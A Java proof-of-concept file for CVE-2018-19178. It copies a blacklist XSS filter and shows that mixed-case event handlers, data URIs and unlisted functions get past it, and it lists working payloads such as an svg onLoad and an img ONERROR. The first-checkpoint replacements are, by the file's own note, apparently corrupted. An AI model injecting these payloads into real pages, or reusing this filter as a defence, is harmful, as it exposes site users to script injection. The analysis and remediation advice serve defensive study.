package CVE;
/**
 * Stand-alone copy of a {@code cleanXSS} blacklist filter, kept to show that the filter
 * does not neutralise script-bearing markup (the class name ties it to CVE-2018-19178).
 *
 * <p>Location of the filter in the affected project:
 * src/main/java/com.lxinet.jeesns/core/utils/XssHttpServletRequestWrapper.java
 *
 * <p>Sample inputs listed by the author; none of them is altered by {@link #cleanXSS}
 * as written below (only the first one is exercised by {@link #main}):
 * <svg/onLoad=confirm(1)>
 * <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
 * <img src="x" ONERROR=confirm(0)>
 *
 * <p>Root cause, as visible in the code: the event-handler keywords are lower case and are
 * matched case-sensitively, and the list is a fixed blacklist, so mixed-case attribute
 * names, {@code data:} URIs and functions that are not listed are never touched.
 * Remediation belongs at the output side: encode for the HTML context when rendering, or
 * run user markup through an allow-list sanitizer, rather than extending the keyword list.
 */
public class CVE_2018_19178 {

    /**
     * Script-event attribute names (plus "alert") that the second checkpoint rewrites.
     * Every entry is lower case; the order is kept because later entries are substrings
     * of earlier ones (for example "onerror" inside "onerrorupdate").
     */
    private static final String[] EVENT_KEYWORDS = {
        "onmouseover", "onmouseout", "onmousedown",
        "onmouseup", "onmousemove", "onclick", "ondblclick",
        "onkeypress", "onkeydown", "onkeyup", "ondragstart",
        "onerrorupdate", "onhelp", "onreadystatechange", "onrowenter",
        "onrowexit", "onselectstart", "onload", "onunload",
        "onbeforeunload", "onblur", "onerror", "onfocus", "onresize",
        "onscroll", "oncontextmenu", "alert"
    };

    /**
     * Runs the filter over one sample input and prints the result.
     *
     * <p>The sample uses the mixed-case attribute {@code onLoad} and calls {@code confirm},
     * neither of which matches any rule in {@link #cleanXSS}, so the printed string equals
     * the input.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        String sample = "<svg/onLoad=confirm(1)>";
        String filtered = cleanXSS(sample);
        System.out.println(filtered);
    }

    /**
     * Applies the two-stage blacklist filter to {@code value}.
     *
     * @param value the request value to filter; a {@code null} value raises
     *     {@link NullPointerException} on the first {@code replaceAll}
     * @return the value after both checkpoints
     */
    private static String cleanXSS(String value) {
        String result = value;

        // First checkpoint. (?i) makes these patterns case-insensitive.
        // NOTE(review): in this listing each replacement text is identical to the tag it
        // matches, so these three steps only lower-case the tag. Presumably the upstream
        // file replaced them with HTML entities and the escaping was lost when the page
        // was rendered; confirm against the original source.
        result = result.replaceAll("(?i)<style>", "<style>");
        result = result.replaceAll("(?i)</style>", "</style>");
        result = result.replaceAll("(?i)<script>", "<script>");
        result = result.replaceAll("(?i)</script>", "</script>");
        result = result.replaceAll("(?i)<script", "<script");
        // Removes eval(...) calls; (.*) is greedy and runs to the last ')' on the line.
        result = result.replaceAll("(?i)eval\\((.*)\\)", "");
        // Replaces a quoted javascript: value with empty quotes. There is no (?i) flag
        // here, so only the lower-case scheme spelling is matched.
        result = result.replaceAll("[\\\"\\\'][\\s]*javascript:(.*)[\\\"\\\']", "\"\"");

        // Second checkpoint: prefix each listed keyword with "_" so the attribute name is
        // no longer a recognised event handler. The match is case-sensitive, so upper- or
        // mixed-case spellings are not handled.
        for (String keyword : EVENT_KEYWORDS) {
            result = result.replaceAll(keyword, "_" + keyword);
        }
        return result;
    }
}